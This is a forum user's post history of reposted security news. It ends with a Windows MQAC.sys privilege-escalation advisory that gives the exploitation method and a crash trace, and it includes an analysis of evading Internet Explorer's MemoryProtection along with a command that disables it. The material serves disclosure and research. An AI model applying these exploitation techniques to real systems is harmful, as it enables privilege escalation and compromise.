-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Hacker turns ATM into 'Doom' arcade game by Lisa Vaas on July 29, 2014 Ever watched a Whirlpool washing machine explode after bouncing around the back yard for 3:42 minutes, a chunk of heavy metal ripping it to shreds from the inside out? There's a hacker responsible for this appliance torture, which he's now expanded to include rigging an ATM so you can play Doom on it (this involves less trauma than the washing machine, in that the ATM survives). Mashable identified the cash machine hacker as an "ingenious Australian lad", Ed Jones, who goes by the handle Aussie50. He says this about what he calls his engineering/scrap metal recycling work: I have a Tenancy to Destroy that which is not useful or repairable, or simply disobeys me. so be sure to watch my motor/appliance destruction videos if you are into stress testing things to the MAX! [sic] Over the weekend, Aussie50 posted a showing off an ATM with its guts exposed, its original PIN pad turned into an arcade controller, the side panel used to select weapons. Its screen now eschews balances and transfers in favor of the familiar sight of a hand wrapped around a gun, going around dark corners and blasting stuff. Were you aware that ATMs - at least the NCR Personas ATM model Aussie50 and his software/wiring/logic partner Julian picked up - have a stereo soundboard in the back? Aussie50 now knows that. Sound system aside, questions abound. For one, can we play with it? That might be on the cards: Aussie50 said in the YouTube comments that he's mulling getting a coin mechanism to install below the card reader. But more security-focused is the question of where the hardware reconfiguration artist got this ATM. Did he pick it up on eBay? Also, should we worry about malicious hackers getting their hands on ATMs and rigging them so as to swindle funds? The answer, of course, is that they've already figured that stuff out. Recent examples of attackers getting into the juicy guts of publicly accessible ATMs abound. One memorable incident, from June, involved two Canadian 14-year-olds who came across an old ATM operators manual online, used its instructions to get into the machine's operator mode, broke into a local market's bank ATM on their school lunch break, printed off documentation regarding how much money was inside and how many withdrawals had been made that day, and changed the surcharge amount to one cent. In the case of that daring duo, I was initially blindsided by the fact that they were precocious tots who reported it to the bank without attempting to profit off their new-found knowledge. They could have wound up in a world of trouble, and/or they could have broken the system they were playing with. For example, as Naked Security's Paul Ducklin pointed out, the kids could have unwittingly triggered a mechanical test sequence that resulted in it spitting out banknotes, which would have left them in the tricky position of having turned into bank robbers. Given that Aussie50's hobby involves scrap metal recycling, we'll assume that he legally procured his ATM of Doom - therefore, he didn't need prior authorization to access somebody else's ATM's computer system (and innards!). Otherwise, if he were playing with somebody else's hardware, one would hope he'd get the go-ahead from the owner(s) of the system he targeted. That's how so-called "white-hat" hackers do it, Paul pointed out: True "white hat" penetration testers don't take the first step without making sure that the scope of their work is known and condoned in writing by their customer. (They don't call it the "get out of jail free" letter for nothing.) Sursa: Hacker turns ATM into ‘Doom’ arcade game | Naked Security
-
CVE: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5102
-
Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers By Dennis Lynch@neato_itsdennis on July 25 2014 10:15 PM Apple Inc. acknowledged on Friday that backup encrypted texts, photos and contacts can be extracted from iPhone by anyone with knowledge of extraction techniques, like Apple employees and law enforcement, Reuters reported. Anyone who wants access to that information just needs access to a computer that a user has “trusted” with data from his or her iPhone. Apple says it’s only for diagnostic purposes, so “enterprise IT departments, developers and Apple [troubleshooters]” can access your phone’s technical data, and isn’t a security issue. “A user must have unlocked their device and agreed to trust another computer before that computer is able to access this limited diagnostic data,” Apple said. “As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services.” The issue was revealed by a self-proclaimed “hacker” and security researcher Jonathan Zdziarski last week at the Hackers on Planet Earth conference in New York City. He says law enforcement or people with malicious intent could access the data in the same way an Apple “Genius” would access it. He calls it a security “back door,” but insists he’s not accusing Apple of “anything malicious” or of “working with the NSA,” but that the flaw is there and could be used by someone seeking personal information. One Twitter user who appears to “jailbreak” iPhones, or unlock them from Apple software limitations, expressed his disapproval of Zdziarski’s reveal, saying he was “giving away all the secrets!” Sursa: Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers
-
Efficacy of MemoryProtection against use-after-free vulnerabilities Simon_Z| July 28, 2014 As of the July 2014 patch of Internet Explorer, Microsoft has taken a major step in the evolution of exploit mitigations built into its browser. The new mitigation technology is called MemoryProtection (or MemProtect, for short) and has been shown to be quite effective against a range of use-after-free (UAF) vulnerabilities. Not all UAFs are equally affected, however. Here we’ll discuss what MemoryProtection is and how it operates, and evaluate its effectiveness against various types of UAFs. High-Level Description of MemoryProtection The heart of MemoryProtection is a new strategy for freeing memory on the heap. When typical C++ code compiled for the Windows platform wishes to free a block of memory on the heap, the operation is implemented by a call to HeapFree. This is a call to the Windows heap manager, and it immediately makes the memory block available for reuse in future allocations. With MemoryProtection, when code wishes to free heap memory, the memory is not immediately freed at the heap manager level. Consequently, the memory is not made available for future allocations – at least not for a very important window in time. Instead of returning the memory to the Windows heap manager, MemoryProtection keeps the memory in an allocated state (as far as the heap manager is concerned), fills the memory with zeroes, and tracks the memory block on a list that MemoryProtection maintains of memory blocks waiting to be freed at the heap manager level. MemoryProtection will ultimately free the block at the heap manager level when it performs a periodic memory reclamation sweep, but only if the stack contains no outstanding references to the block. Since application-level frees and heap manager-level frees no longer occur at the same time, there is room for confusion whenever a “free” is mentioned. For the purposes of this post, a “free” will mean an application-level free unless specified otherwise. Also, when speaking of a free at the heap manager level we will sometimes speak of the memory being “released” or “returned” to the heap manager. Detailed Description of MemoryProtection MemoryProtection maintains a per-thread list of freed memory blocks that are still waiting to be freed at the heap manager level. We will call this the “wait list”. When code in Internet Explorer wishes to free a block of memory on the heap, it calls the function MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree. (Note, however, that in many places this function is inlined, which means that its body is copied in its entirety into the compiled code of other functions.) This method performs the following steps: 1. Check if the wait list for the current thread contains at least 100,000 total bytes of memory waiting to be freed at the heap manager level. If so, perform a reclamation sweep (see below). 2. Add an entry to the current thread’s wait list, recording the block’s address, its size, and whether the block resides on the regular process heap or on the isolated heap. 3. Fill the memory block with zeroes. To perform a reclamation sweep, the steps are as follows. These steps are implemented by MemoryProtection::CMemoryProtector::MarkBlocks and MemoryProtection::CMemoryProtector:: ReclaimUnmarkedBlocks. All operations apply to the current thread’s wait list only. 1. Sort the wait list in increasing order of block address. 2. Place a mark on every wait list entry whose block is still pointed to by a pointer residing on the current thread’s stack. The pointer could be either a pointer to the start of the block or a pointer to any memory location falling within the block’s address range. 3. Iterate over the wait list. For each wait list entry encountered that is not marked, release the memory block at the heap manager level via an actual call to HeapFree, and remove the block from the wait list. Remove all marks from marked entries. In addition, an unconditional reclamation step is performed periodically. This occurs each time Internet Explorer’s WndProc is entered to service a message for the thread’s main window. At that time, the entire wait list is emptied and all waiting blocks are returned to the heap manager. The function performing this action is MemoryProtection::CMemoryProtector::ReclaimMemoryWithoutProtection. For efficiency, the wait list is rearranged in certain ways while performing the iteration in step 3 above. Therefore blocks are not necessarily freed in order of increasing address, nor are they always freed in the same order in which they are placed on the wait list. For research and debugging purposes it is often useful to be able to observe the behavior of Internet Explorer without MemoryProtection. In particular, MemoryProtection will interfere with the ability to use the heap manager’s call stack database to capture the call stack at the time of an application-level free. (By the same token, MemoryProtection actually makes it easier to capture the call stack at the time of allocation.) MemoryProtection can effectively be turned off via a manual procedure by writing the value 0xffffffff to the variable MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance. In WinDbg, this can be done via the following command: ed MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance 0xffffffff Effect of MemoryProtection on UAFs When an IE exploit leveraging a UAF is run unmodified against the newly MemoryProtection-enabled IE, the result will often resemble a null-pointer dereference. At the point in time when the exploit attempts to perform an allocation reusing memory from the freed block, the original memory block has not yet been returned to the heap manager; as a result, the exploit code fails to cause a new allocation at that location. Ultimately, when IE makes its improper use of the freed memory, any data read consists of zeroes. Often this will cause a quick and harmless termination of the IE process when the zero value is interpreted as a pointer and is dereferenced. It’s important to realize that even when the symptom appears to indicate that the bug is a null-pointer dereference, the underlying cause actually may be a UAF and a potential security risk. Let’s consider how an attacker might be able to modify the exploit in order to evade MemoryProtection. For a successful attack, the exploit must be able to trigger a memory sweep in between the free and the reallocation. Furthermore, at the time of this sweep, the stack must not contain any outstanding references to the freed block. It follows that there are some UAFs that are impossible to exploit under MemoryProtection. Specifically: If an outstanding stack reference exists for the entire period of time between the free and the later use, then it is impossible to cause reclamation of the freed block. This is a common situation that accounts for a large percentage of UAFs. Many UAFs are the result of a situation in which a free occurring at a deeper level in the call stack leaves a dangling pointer (sometimes a “this” pointer) at a higher level in the call stack. The crash occurs when the stack is popped to the level at which the dangling pointer resides. This very common type of UAF is now non-exploitable. As for UAFs not falling into the above category, however, the situation is quite different. Consider the case of a UAF in which a certain script action results in a dangling pointer being stored in heap memory, more or less permanently – by which we mean that the dangling pointer remains in place even after the return of all currently executing functions. The malicious script can then trigger the use of the dangling pointer at a much later point in time. We call these “long-lived” UAFs. In the case of a long-lived UAF, MemoryProtection offers no real defense. An attacker can ensure that the memory block is freed at the heap manager level by allowing Internet Explorer’s message loop to execute, as this will trigger an unconditional release of all waiting blocks. Though it may seem that the additional blocks released during this sweep have the potential to disrupt the exploit by causing various heap coalesces that are hard to predict, this problem can largely be eliminated by properly preparing the wait list so it will contain a minimum of entries at the time of the sweep. For UAFs not falling into the above categories MemoryProtection may provide partial or full mitigation. Consider the common case of a UAF in which the free and the use occur within the same script method. In the past, some of these have been exploitable conditions. MemoryProtection adds some additional hurdles that an attacker must clear. By referring to the ProtectedFree algorithm above, you can see that when IE calls ProtectedFree on a block of memory, the memory is never returned to the Windows heap manager at that time – not even if the wait list is very full. The return of the memory to the heap manager will always be delayed at least until the next call to ProtectedFree, at which point a sweep could occur. Therefore, an additional hurdle for an attacker in this situation is to find a way to force an additional free in between the free and the reallocation. This additional free must be performed on the same thread as the original free, since wait lists are maintained on a per-thread basis. For certain bugs this additional requirement will make exploitation impossible or too unreliable for use by an adversary. In other cases, when it is easy to force an additional free, MemoryProtection provides a weak form of protection by making it a bit more complex to arrange for a desired sequence of frees at the heap manager level. Typically it is possible to evade this protection through the addition of additional script actions that prepare the wait list, forcing it into a known desired state containing only a small number of entries. In Summary MemoryProtection is a significant new mitigation that makes Internet Explorer more secure by eliminating entire classes of UAFs and rendering them non-exploitable. For other classes of UAFs MemoryProtection is ineffective or only partially effective. Researchers should be aware that some IE crashes that appear to be null-pointer dereferences actually mask an underlying exploitable bug. Simon Zuckerbraun Security Researcher, HP ZDI Sursa: Efficacy of MemoryProtection against use-after-fre... - HP Enterprise Business Community
-
Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 360, 2014 - Introduction - Attacking antivirus engines - Finding vulnerabilities - Exploiting antivirus engines - Antivirus vulnerabilities - Conclusions - Recommendations Download: http://www.syscan360.org/slides/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf
-
[h=3]Noodling about IM protocols[/h]The last couple of months have been a bit slow in the blogging department. It's hard to blog when there are exciting things going on. But also: I've been a bit blocked. I have two or three posts half-written, none of which I can quite get out the door. Instead of writing and re-writing the same posts again, I figured I might break the impasse by changing the subject. Usually the easiest way to do this is to pick some random protocol and poke at it for a while to see what we learn. The protocols I'm going to look at today aren't particularly 'random' -- they're both popular encrypted instant messaging protocols. The first is OTR (Off the Record Messaging). The second is Cryptocat's group chat protocol. Each of these protocols has a similar end-goal, but they get there in slightly different ways. I want to be clear from the start that thisposthas absolutely no destination. If you're looking for exciting vulnerabilities in protocols, go check out someone else's blog. This is pure noodling. The OTR protocol OTR is probably the most widely-used protocol for encrypting instant messages. If you use IM clients like Adium, Pidgin or ChatSecure, you already have OTR support. You can enable it in some other clients through plugins and overlays. OTR was originally developed by Borisov, Goldberg and Brewer and has rapidly come to dominate its niche. Mostly this is because Borisov et al. are smart researchers who know what they’re doing. Also: they picked a cool name and released working code. OTR works within the technical and usage constraints of your typical IM system. Roughly speaking, these are: Messages must be ASCII-formatted and have some (short) maximum length. Users won't bother to exchange keys, so authentication should be "lazy" (i.e., you can authenticate your partners after the fact). Your chat partners are all FBI informants so your chat transcripts must be plausibly deniable -- so as to keep them from being used as evidence against you in a court of law. Coming to this problem fresh, you might find goal (3) a bit odd. In fact, to the best of my knowledge no court in the history of law has ever used a cryptographic transcript as evidence that a conversation occurred. However it must be noted that this requirement makes the problem a bit more sexy. So let's go with it! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Dammit, they used a deniable key exchange protocol" said no Federal prosecutor ever.[/TD] [/TR] [/TABLE] The OTR (version 2/3) handshake is based on the SIGMA key exchange protocol. Briefly, it assumes that both parties generate long-term DSA public keys which we'll denote by (pubA, pubB). Next the parties interact as follows: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The OTRv2/v3 AKE. Diagram by Bonneau and Morrison, all colorful stuff added. There's also an OTRv1 protocol that's too horrible to talk about here.[/TD] [/TR] [/TABLE] There are four elements to this protocol: Hash commitment. First, Bob commits to his share of a Diffie-Hellman key exchange (g^x) by encrypting it under a random AES key r and sending the ciphertext and a hash of g^x over to Alice. Diffie-Hellman Key Exchange. Next, Alice sends her half of the key exchange protocol (g^y). Bob can now 'open' his share to Alice by sending the AES key r that he used to encrypt it in the previous step. Alice can decrypt this value and check that it matches the hash Bob sent in the first message. Now that both sides have the shares (g^x, g^y) they each use their secrets to compute a shared secret g^{xy} and hash the value several ways to establish shared encryption keys (c', Km2, Km'2) for subsequent messages. In addition, each party hashes g^{xy} to obtain a short "session ID". The sole purpose of the commitment phase (step 1) is to prevent either Alice or Bob from controlling the value of the shared secret g^{xy}. Since the session ID value is derived by hashing the Diffie-Hellman shared secret, it's possible to use a relatively short session ID value to authenticate the channel, since neither Alice nor Bob will be able to force this ID to a specific value. Exchange of long-term keys and signatures. So far Alice and Bob have not actually authenticated that they're talking to each other, hence their Diffie-Hellman exchange could have been intercepted by a man-in-the-middle attacker. Using the encrypted channel they've previously established, they now set about to fix this. Alice and Bob each send their long-term DSA public key (pubA, pubB) and key identifiers, as well as a signature on (a MAC of) the specific elements of the Diffie-Hellman message (g^x, g^y) and their view of which party they're communicating with. They can each verify these signatures and abort the connection if something's amiss.** Revealing MAC keys. After sending a MAC, each party waits for an authenticated response from its partner. It then reveals the MAC keys for the previous messages. Lazy authentication. Of course if Alice and Bob never exchange public keys, this whole protocol execution is still vulnerable to a man-in-the-middle (MITM) attack. To verify that nothing's amiss, both Alice and Bob should eventually authenticate each other. OTR provides three mechanisms for doing this: parties may exchange fingerprints (essentially hashes) of (pubA, pubB) via a second channel. Alternatively, they can exchange the "session ID" calculated in the second phase of the protocol. A final approach is to use the Socialist Millionaires' Problem to prove that both parties share the same secret. The OTR key exchange provides the following properties: Protecting user identities. No user-identifying information (e.g., long-term public keys) is sent until the parties have first established a secure channel using Diffie-Hellman. The upshot is that a purely passive attacker doesn't learn the identity of the communicating partners -- beyond what's revealed by the higher-level IM transport protocol.* Unfortunately this protection fails against an active attacker, who can easily smash an existing OTR connection to force a new key agreement and run an MITM on the Diffie-Hellman used during the next key agreement. This does not allow the attacker to intercept actual message content -- she'll get caught when the signatures don't check out -- but she can view the public keys being exchanged. From the client point of view the likely symptoms are a mysterious OTR error, followed immediately by a successful handshake. One consequence of this is that an attacker could conceivably determine which of several clients you're using to initiate a connection. Weak deniability. The main goal of the OTR designers is plausible deniability. Roughly, this means that when you and I communicate there should be no binding evidence that we really had the conversation. This rules out obvious solutions like GPG-based chats, where individual messages would be digitally signed, making them non-repudiable. Properly defining deniability is a bit complex. The standard approach is to show the existence of an efficient 'simulator' -- in plain English, an algorithm for making fake transcripts. The theory is simple: if it's trivial to make fake transcripts, then a transcript can hardly be viewed as evidence that a conversation really occurred. OTR's handshake doesn't quite achieve 'strong' deniability -- meaning that anyone can fake a transcript between any two parties -- mainly because it uses signatures. As signatures are non-repudiable, there's no way to fake one without actually knowing your public key. This reveals that we did, in fact, communicate at some point. Moreover, it's possible to create an evidence trail that I communicated with you, e.g., by encoding my identity into my Diffie-Hellman share (g^x). At very least I can show that at some point you were online and we did have contact. But proving contact is not the same thing as proving that a specific conversation occurred. And this is what OTR works to prevent. The guarantee OTR provides is that if the target was online at some point and you could contact them, there's an algorithm that can fake just about any conversation with the individual. Since OTR clients are, by design, willing to initiate a key exchange with just about anyone, merely putting your client online makes it easy for people to fake such transcripts.*** Towards strong deniability. The 'weak' deniability of OTR requires at least tacit participation of the user (Bob) for which we're faking the transcript. This isn't a bad property, but in practice it means that fake transcripts can only be produced by either Bob himself, or someone interacting online with Bob. This certainly cuts down on your degree of deniability. A related concept is 'strong deniability', which ensures that any party can fake a transcript using only public information (e.g., your public keys). OTR doesn't try achieve strong deniability -- but it does try for something in between. The OTR version of deniability holds that an attacker who obtains the network traffic of a real conversation -- even if they aren't one of the participants -- should be able alter the conversation to say anything he wants. Sort of. The rough outline of the OTR deniability process is to generate a new message authentication key for each message (using Diffie-Hellman) and then reveal those keys once they've been used up. In theory, a third party can obtain this transcript and -- if they know the original message content -- they can 'maul' the AES-CTR encrypted messages into messages of their choice, then they can forge their own MACs on the new messages. [TABLE=class: tr-caption-container, align: center] [TR] [TD][/TD] [/TR] [TR] [TD=class: tr-caption]OTR message transport (source: Bonneau and Morrison, all colored stuff added).[/TD] [/TR] [/TABLE] Thus our hypothetical transcript forger can take an old transcript that says "would you like a Pizza" and turn it into a valid transcript that says, for example, "would you like to hack STRATFOR"... Except that they probably can't, since the first message is too short and... oh lord, this whole thing is a stupid idea -- let's stop talking about it. The OTRv1 handshake. Oh yes, there's also an OTRv1 protocol that has a few issues and isn't really deniable. Even better, an MITM attacker can force two clients to downgrade to it, provided both support that version. Yuck. So that's the OTR protocol. While I've pointed out a few minor issues above, the truth is that the protocol is generally an excellent way to communicate. In fact it's such a good idea that if you really care about secrecy it's probably one of the best options out there. Cryptocat Since we're looking at IM protocols I thought it might be nice to contrast with another fairly popular chat protocol: Cryptocat's group chat. Cryptocat is a web-based encrypted chat app that now runs on iOS (and also in Thomas Ptacek's darkest nightmares). Cryptocat implements OTR for 'private' two-party conversations. However OTR is not the default. If you use Cryptocat in its default configuration, you'll be using its hand-rolled protocol for group chats. The Cryptocat group chat specification can be found here, and it's remarkably simple. There are no "long-term" keys in Cryptocat. Diffie-Hellman keys are generated at the beginning of each session and re-used for all conversations until the app quits. Here's the handshake between two parties: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Cryptocat group chat handshake (current revision). Setting is Curve25519. Keys are generated when the application launches, and re-used through the session.[/TD] [/TR] [/TABLE] If multiple people join the room, every pair of users repeats this handshake to derive a shared secret between every pair of users. Individuals are expected to verify each others' keys by checking fingerprints and/or running the Socialist Millionaire protocol. Unlike OTR, the Cryptocat handshake includes no key confirmation messages, nor does it attempt to bind users to their identity or chat room. One implication of this is that I can transmit someone else's public key as if it were my own -- and the recipients of this transmission will believe that the person is actually part of the chat. Moreover, since public keys aren't bound to the user's identity or the chat room, you could potentially route messages between a different user (even a user in a different chat room) while making it look like they're talking to you. Since Cryptocat is a group chat protocol, there might be some interesting things you could do to manipulate the conversation in this setting.**** Does any of this matter? Probably not that much, but it would be relatively easy (and good) to fix these issues. Message transmission and consistency. The next interesting aspect of Cryptocat is the way it transmits encrypted chat messages. One of the core goals of Cryptocat is to ensure that messages are consistent between individual users. This means that all users should be able to verify that the other user is receiving the same data as it is. Cryptocat uses a slightly complex mechanism to achieve this. For each pair of users in the chat, Cryptocat derives an AES key and an MAC key from the Diffie-Hellman shared secret. To send a message, the client: Pads the message by appending 64 bytes of random padding. Generates a random 12-byte Initialization Vector for each of the N users in the chat. Encrypts the message using AES-CTR under the shared encryption key for each user. Concatenates all of the N resulting ciphertexts/IVs and computes an HMAC of the whole blob under each recipient's key. Calculates a 'tag' for the message by hashing the following data: padded plaintext || HMAC-SHA512alice || HMAC-SHA512bob || HMAC-SHA512carol || ... Broadcasts the N ciphertexts, IVs, MACs and the single 'tag' value to all users in the conversation. When a recipient receives a message from another user, it verifies that: The message contains a valid HMAC under its shared key. This IV has not been received before from this sender. The decrypted plaintext is consistent with the 'tag'. Roughly speaking, the idea here is to make sure that every user receives the same message. The use of a hashed plaintext is a bit ugly, but the argument here is that the random padding protects the message from guessing attacks. Make what you will of this. Anti-replay. Cryptocat also seeks to prevent replay attacks, e.g., where an attacker manipulates a conversation by simply replaying (or reflecting) messages between users, so that users appear to be repeating statements. For example, consider the following chat transcripts: [TABLE=class: tr-caption-container, align: center] [TR] [TD][/TD] [/TR] [TR] [TD=class: tr-caption]Replays and reflection attacks. [/TD] [/TR] [/TABLE] Replay attacks are prevented through the use of a global 'IV array' that stores all previously received and sent IVs to/from all users. If a duplicate IV arrives, Cryptocat will reject the message. This is unwieldy but it generally seems ok to prevent replays and reflection. A limitation of this approach is that the IV array does not live forever. In fact, from time to time Cryptocat will reset the IV array without regenerating the client key. This means that if Alice and Bob both stay online, they can repeat the key exchange and wind up using the same key again -- which makes them both vulnerable to subsequent replays and reflections. (Update: This issue has since been fixed). In general the solution to these issues is threefold: Keys shouldn't be long-term, but should be regenerated using new random components for each key exchange. Different keys should be derived for the Alice->Bob and Bob->Alice direction It would be be more elegant to use a message counter than to use this big, unwieldy key array. The good news is that the Cryptocat developers are working on a totally new version of the multi-party chat protocol that should be enormously better. In conclusion I said this would be a post that goes nowhere, and I delivered! But I have to admit, it helps to push it out of my system. None of the issues I note above are the biggest deal in the world. They're all subtle issues, which illustrates two things: first, that crypto is hard to get right. But also: that crypto rarely fails catastrophically. The exciting crypto bugs that cause you real pain are still few and far between. Notes: * In practice, you might argue that the higher-level IM protocol already leaks user identities (e.g., Jabber nicknames). However this is very much an implementation choice. Moreover, even when using Jabber with known nicknames, you might access the Jabber server using one of several different clients (your computer, phone, etc.). Assuming you use Tor, the only indication of this might be the public key you use during OTR. So there's certainly useful information in this protocol. ** Notice that OTR signs a MAC instead of a hash of the user identity information. This happens to be a safe choice given that the MAC used is based on HMAC-SHA2, but it's not generally a safe choice. Swapping the HMAC out for a different MAC function (e.g., CBC-MAC) would be catastrophic. *** To get specific, imagine I wanted to produce a simulated transcript for some conversation with Bob. Provided that Bob's client is online, I can send Bob any g^x value I want. It doesn't matter if he really wants to talk to me -- by default, his client will cheerfully send me back his own g^y and a signature on (g^x, g^y, pub_B, keyid_ which, notably, does not include my identity. From this point on all future authentication is performed using MACs and encrypted under keys that are known to both of us. There's nothing stopping me from faking the rest of the conversation. **** Incidentally, a similar problem exists in the OTRv1 protocol. Posted by Matthew Green at 9:31 AM Sursa: A Few Thoughts on Cryptographic Engineering: Noodling about IM protocols
-
Black Hat presentation on unmasking TOR users suddenly cancelled Jeremy Kirk, IDG News Service A presentation on a low-budget method to unmask users of a popular online privacy tool, TOR, will no longer go ahead at the Black Hat security conference early next month. The talk was nixed by the legal counsel with Carnegie Mellon’s Software Engineering Institute after a finding that materials from researcher Alexander Volynkin were not approved for public release, according to a notice on the conference’s website. It’s rare but not unprecedented for Black Hat presentations to be cancelled. It was not clear why lawyers felt Volynkin’s presentation should not proceed. Volynkin, a research scientist with the university’s Computer Emergency Response Team (CERT) was due to give a talk entitled “You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget” at the conference, which take places Aug. 6-7 in Last Vegas. TOR is short for The Onion Router, which is a network of distributed nodes that provide greater privacy by encrypting a person’s browsing traffic and routing that traffic through random proxy servers. Although originally developed by the U.S. Naval Research Laboratory, it is now maintained by The TOR Project. TOR is widely used by both cybercriminals and those with legitimate interests in preserving their anonymity, such as dissidents and journalists. Although TOR masks a computer’s true IP address, advanced attacks have been developed that undermine its effectiveness. Some of Volynkin’s materials were informally shared with The TOR Project, a nonprofit group that oversees the TOR, wrote Roger Dingledine, a co-founder of the organization, in mailing list post on Monday. The TOR Project did not request the talk to be canceled, Dingledine wrote. Also, the group has not received slides or descriptions of Volynkin’s talk that go beyond an abstract that has now been deleted from Black Hat’s website. Dingledine wrote that The TOR Project is working with CERT to do a coordinated disclosure around Volynkin’s findings, possibly later this week. In general, the group encourages researchers to responsibly disclose information about new attacks. “Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues and generally positive to work with,” Dingledine wrote. Sursa: Black Hat presentation on unmasking TOR users suddenly cancelled | PCWorld
-
DARPA-derived secure microkernel goes open source tomorrow Hacker-repelling, drone-protecting code will soon be yours to tweak as you see fit By Darren Pauli, 28 Jul 2014 A nippy microkernel mathematically proven to be bug free*, and used to protect drones from hacking, will be released as open source tomorrow. The formal-methods-based secure embedded L4 (seL4) microkernel was developed by Australian boffins at National ICT Australia (NICTA) and was part of the US Defense Advanced Research Projects Agency's High-Assurance Cyber Military Systems program hatched in 2012 to stop hackers knocking unmanned birds out of the sky. It was noted as the most advanced and highly-assured member of the L4 microkernel family due to its use of formal methods that did not impact performance. A microkernel differs from monolithic kernels – such as the Linux and Windows kernels – by running as much code as possible – from drivers to system services – in user space, making the whole thing more modular and (in theory) more stable. Tomorrow at noon Eastern Australian Standard Time (GMT +10) seL4's entire source code including proofs and additional code used to build trustworthy systems will be released under the GPL v2 licence. A global group of maths and aviation gurus from the likes of Boeing and Rockwell Collins joined a team of dedicated NICTA researchers on the project which involved the seL4 operating system designed to detect and foil hacking attempts. NICTA senior researcher Doctor June Andronick said the kernel should be considered by anyone building critical systems such as pacemakers and technology-rich cars. "If your software runs the seL4 kernel, you have a guarantee that if a fault happens in one part of the system it cannot propagate to the rest of the system and in particular the critical parts," Andronick said earlier this month. "We provide a formal mathematical proof that this seL4 kernel is correct and guarantees the isolation between components." NICTA demonstrated in a video how a drone which running the platform could detect hacking attempts from ground stations that would normally cause the flight software to die and the aircraft to crash. "What we are demonstrating here is that if one of the ground stations is malicious, and sends a command to the drone to stop the flight software, the commercially-available drone will accept the command, kill the software and just drop from the sky," Andronick said. The researchers' demo drone would instead detect the intrusion at temp, flash its led lights and fly away. This could ensure that real drone missions could continue in the event of hacking attempts by combatants. Andronick said seL4 would come into play as the team added more functionality including navigation, autonomous flight and mission control components. In depth information about seL4 was available on the NICTA website and within the paper Comprehensive Formal Verification of an OS Microkernel. ® * That's bug free according to the formal verification of its specification; design flaws in the specs aren't counted by the team. Sursa: DARPA-derived secure microkernel goes open source tomorrow • The Register
-
ASUS Launches the Fastest Wi-FI Router Ever, at 2.33 Gbps
Nytro replied to SirGod's topic in Stiri securitate
Eu o sa ma multumesc cu asta: Asus RT-AC68U Dual-band Wireless-AC1900 Gigabit Router, USB 3.0, IEEE 802.11a/b/g/n - eMAG.ro Ar mai fi "baiatu vesel": Router Wireless Linksys Smart Wi-Fi WRT1900AC, Dual Band, USB, AC1900 - eMAG.ro Dar prefer ASUS-ul. Prea mare diferenta de pret. Sunt curios cat o sa coste. Si cat de usor poti praji oua langa el. -
Those are probably fixed. The exploit does NOT check if the forum is vulnerable. If it shows this error on Home - vBulletin Community Forum it means it was fixed.
-
Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Authored by Matthew Bergin A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft MQ Access Control version 5.1.0.1110 on XP SP3 is affected. Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-003 Publication Date: 2014.07.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: MQ Access Control Affected Versions: 5.1.0.1110 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver. OLLOWUP_IP: mqac!AC2QM+5d b230af37 891e mov dword ptr [esi],ebx Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) ErrCode = 00000002 eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 eip=b230af37 esp=b1c45a38 